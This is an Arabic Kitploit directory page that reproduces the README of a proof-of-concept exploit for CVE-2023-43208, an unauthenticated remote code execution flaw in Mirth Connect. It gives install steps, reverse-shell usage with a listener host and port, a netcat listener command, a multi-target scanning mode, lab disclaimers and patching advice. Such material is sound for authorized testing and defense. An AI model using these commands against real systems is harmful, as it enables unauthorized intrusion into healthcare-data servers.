Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-2023-43208 — استغلال إثبات مفهوم لـ CVE-2023-43208، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Mirth Connect قبل الإصدار 4.4.1. | Kitploit
أدوات/GitHubGitHub/mkirahmet/poc-2023-43208
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubmkirahmet/poc-2023-43208

PoC-2023-43208

استغلال إثبات مفهوم لـ CVE-2023-43208، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Mirth Connect قبل الإصدار 4.4.1.

عرض المستودع
3منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208-EXPLOIT

استغلال تنفيذ التعليمات البرمجية عن بُعد (RCE) في Mirth Connect

Python Version Version CVE Lab Use Only

⚠️ للاستخدام التعليمي والمختبري فقط ⚠️

استغلال إثبات المفهوم لـ CVE-2023-43208، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد في Mirth Connect قبل الإصدار 4.4.1.

🚨 إخلاء مسؤولية قانوني مهم

هذه الأداة مخصصة فقط لـ:

  • 🧪 الأغراض التعليمية
  • 🔬 اختبار الأمان المصرح به في بيئات المختبر
  • 📚 البحث والتعلم في مجال الأمن السيبراني

لا تستخدم:

  • ❌ ضد أنظمة لا تملكها
  • ❌ بدون إذن كتابي صريح
  • ❌ في بيئات الإنتاج
  • ❌ لأغراض غير قانونية أو ضارة

أنت مسؤول عن الامتثال لجميع القوانين واللوائح المعمول بها. قد يؤدي سوء استخدام هذه الأداة إلى تهم جنائية.

📋 الوصف

يستهدف هذا الاستغلال ثغرة إلغاء تسلسل XML في نقطة النهاية /api/users في Mirth Connect، مما يسمح بتنفيذ تعليمات برمجية عن بُعد بدون مصادقة على الإصدارات المتأثرة (< 4.4.1).

هذه ثغرة حرجة ويجب اختبارها فقط في بيئات مختبرية معزولة باستخدام أنظمتك الخاصة.

🔧 المتطلبات

  • Python 3.7 أو أحدث
  • الحزم المطلوبة المدرجة في requirements.txt
  • بيئة مختبرية تحتوي على مثيل Mirth Connect ضعيف

🚀 التثبيت

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/M0h4/CVE-2023-43208-EXPLOIT.git
cd CVE-2023-43208-EXPLOIT

# تثبيت المتطلبات
pip install -r requirements.txt

💻 الاستخدام (للاستخدام المختبري فقط)

الوضع التفاعلي (موصى به للمختبر)

root@kitploit:~
python exploit.py

وضع سطر الأوامر

root@kitploit:~
# استغلال هدف واحد (للاستخدام المختبري فقط)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444

# مسح أهداف متعددة من ملف (للاستخدام المختبري فقط)
python exploit.py -f targets.txt -t 50 -o vulnerable.txt

# وضع غير تفاعلي (للاستخدام المختبري فقط)
python exploit.py -u https://target:8443 -lh 10.10.14.5 -lp 4444 --no-interactive

الخيارات

root@kitploit:~
-u, --url       عنوان الهدف المستهدف (للاستخدام المختبري فقط)
-lh, --lhost    عنوان المستمع (عنوان IP الخاص بك)
-lp, --lport    منفذ الاستماع
-f, --file      ملف يحتوي على عناوين الأهداف للمسح
-o, --output    ملف الإخراج لحفظ نتائج المسح
-t, --threads   عدد الخيوط للمسح (الافتراضي: 50)
--no-interactive تشغيل في الوضع غير التفاعلي

🎯 مثال على بيئة المختبر

قم بإعداد مختبرك:

  1. قم بتثبيت إصدار Mirth Connect الضعيف (< 4.4.1) في جهاز افتراضي معزول
  2. استخدم شبكة خاضعة للتحكم (مثل NAT/Host-only في VirtualBox/VMware)
  3. لا تعرضه للإنترنت أبدًا

ابدأ المستمع الخاص بك:

root@kitploit:~
ncat -lnvp 4444
# أو
nc -lnvp 4444

شغّل الاستغلال في مختبرك:

root@kitploit:~
python exploit.py -u https://192.168.1.100:8443 -lh 192.168.1.50 -lp 4444

🧪 متطلبات بيئة الاختبار

  • شبكة/VLAN معزولة
  • أجهزة افتراضية فقط
  • لا توجد بيانات إنتاجية
  • قواعد جدار حماية تمنع الوصول الخارجي
  • توثيق التصريح المناسب

📝 التفاصيل التقنية

  • نوع الثغرة: XML Deserialization RCE
  • الإصدارات المتأثرة: Mirth Connect < 4.4.1
  • الإصدار الثابت: 4.4.1 وما فوق
  • درجة CVSS: 9.8 (حرج)
  • ناقل الهجوم: شبكة
  • المصادقة: غير مطلوبة

يستخدم الاستغلال أدوات Commons Collections لتحقيق تنفيذ التعليمات البرمجية عن بُعد من خلال نقطة النهاية /api/users.

🛡️ إجراءات الحماية

إذا كنت تدير Mirth Connect:

  • ✅ قم بالتحديث إلى الإصدار 4.4.1 أو أحدث
  • ✅ قم بتقييد الوصول إلى واجهات الإدارة عبر الشبكة
  • ✅ قم بتطبيق المصادقة المناسبة
  • ✅ راقب الحمولات XML المشبوهة

👥 الإسناد

  • المؤلفون الأصليون: K3ysTr0K3R & Chocapikk
  • تم التعديل بواسطة: M0h4
  • CVE: CVE-2023-43208

⚠️ تحذير نهائي

╔══════════════════════════════════════════════════════════════╗ ║ هذه الأداة للاستخدام المختبري فقط ║ ║ الاستخدام غير المصرح به غير قانوني وغير أخلاقي ║ ║ أنت تتحمل كل المخاطر والمسؤوليات ║ ║ المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام ║ ╚══════════════════════════════════════════════════════════════╝

تنزيل الأداة